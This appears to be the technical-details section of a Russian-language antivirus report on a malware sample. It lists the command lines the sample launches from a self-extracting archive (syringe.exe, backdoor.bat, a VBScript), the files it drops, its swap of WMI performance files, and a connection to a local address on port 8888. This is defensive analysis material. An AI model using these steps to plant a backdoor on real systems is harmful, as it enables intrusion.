Техническая информация
- %TEMP%\7ZipSfx.000\syringe.exe -3 <остаток командной строки отсутствует в тексте>
- <SYSTEM32>\cmd.exe /c ""%TEMP%\7ZipSfx.000\s.bat" "
- <SYSTEM32>\wbem\wmiadap.exe /R /T
- <SYSTEM32>\cmd.exe /c ""%TEMP%\7ZipSfx.000\backdoor.bat" "
- <SYSTEM32>\wscript.exe i.vbs s.bat
- %TEMP%\7ZipSfx.000\s.bat
- <SYSTEM32>\wbem\Performance\WmiApRpl_new.ini
- %TEMP%\7ZipSfx.000\syringe.exe
- %TEMP%\7ZipSfx.000\backdoor.bat
- %TEMP%\7ZipSfx.000\i.vbs
- %TEMP%\7ZipSfx.000\s.bat
- %TEMP%\7ZipSfx.000\syringe.exe
- %TEMP%\7ZipSfx.000\backdoor.bat
- %TEMP%\7ZipSfx.000\i.vbs
- из <SYSTEM32>\wbem\Performance\WmiApRpl_new.ini в <SYSTEM32>\wbem\Performance\WmiApRpl.ini
- из <SYSTEM32>\wbem\Performance\WmiApRpl_new.h в <SYSTEM32>\wbem\Performance\WmiApRpl.h
- '<IP-адрес в локальной сети>':8888
- ClassName: 'Shell_TrayWnd' WindowName: ''